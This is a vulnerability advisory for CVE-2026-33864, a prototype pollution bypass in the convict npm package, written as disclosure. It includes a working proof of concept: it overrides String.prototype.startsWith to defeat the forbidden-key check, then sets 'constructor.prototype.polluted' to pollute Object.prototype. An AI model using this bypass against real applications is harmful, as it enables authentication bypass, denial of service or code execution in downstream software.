Node.js CVE-2026-33864

Summary

A prototype pollution vulnerability exists in the latest version of the convict npm package (6.2.4). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input started with a forbidden key, it is still possible to pollute Object.prototype via a crafted input using String.prototype.

Details

The vulnerability resides in line 564 of https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js where startsWith() function is used to check whether user provided input contain forbidden strings.

PoC

#### Steps to reproduce

1. Install latest version of convict using npm install or cloning from git
2. Run the following code snippet:

String.prototype.startsWith = () => false;
const convict = require('convict');
let obj = {};
const config = convict(obj);
console.log({}.polluted);
config.set('constructor.prototype.polluted', 'yes');
console.log({}.polluted);    // prints yes -> the patch is bypassed and prototype pollution occurred

#### Expected behavior Prototype pollution should be prevented and {} should not gain new properties. This should be printed on the console:

undefined
undefined OR throw an Error

#### Actual behavior Object.prototype is polluted This is printed on the console:

undefined
yes

Impact

This is a prototype pollution vulnerability, which can have severe security implications depending on how convict is used by downstream applications. Any application that processes attacker-controlled input using convict.set may be affected. It could potentially lead to the following problems:

1. Authentication bypass
2. Denial of service
3. Remote code execution (if polluted property is passed to sinks like eval or child_process)